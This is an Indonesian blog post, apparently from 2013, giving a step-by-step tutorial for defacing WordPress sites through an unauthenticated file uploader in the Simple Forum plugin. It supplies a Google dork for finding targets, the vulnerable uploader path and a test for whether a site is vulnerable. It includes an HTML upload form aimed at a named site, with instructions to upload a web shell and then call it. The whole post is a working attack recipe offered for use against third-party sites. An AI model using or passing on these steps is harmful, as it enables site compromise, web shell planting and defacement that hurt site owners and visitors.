Pages

Senin, 24 Juni 2013

Deface Web Wordpress Via CSFR


Halo Semua  Expect Panda kembali lagi nih membawa oleh - oleh yaitu cara Upload Via CSFR Wordpress Oke Langsung Saja yaaa Snicker , 

-Dork : inurl:/plugins/simple-forum/
-Exploit : /resources/jscript/ajaxupload/sf-uploader.php

Caranya : Cari Target Dengan Dork Diatas Dengan Google.com , Kembangkan Dork Jika Ingin Dapat Situs Vuln Banyak !

Jika Sudah Dapat :
CONTOH : http://Shape.by/wp-content...ple-forum/

JADI : http://Shape.by/wp-content...loader.php

Jika Keluar Tulisan error ! site bisa vuln ! kalau Access Denied ! Tidak Vuln Smile


Untuk Cara Upload nya Pakai Script Dibawah Jika Kalian Dapat Situs yang Vuln 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code:
<form enctype="multipart/form-data"

action="http://mamaklub.longtail.sk/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">

<input type="jpg" name="url" value="./" /><br />

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

CATATAN ! http://mamaklub.longtail.sk/wp-content/p...loader.php : Di Ganti Dengan Situs Vuln Tadi , Lalu Save As Dengan Ekstensi .html Smile Lalu Upload Shell Mu Di Form Uploader

Cara memanggil Shell kamu: http://www.site.com/wp-content/plugins/s...ashell.php

cukup sekian tutorial dari Panda semoga bisa bermanfaat dan jangan pernah menyerah Welcome Incense
Diposting oleh di

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)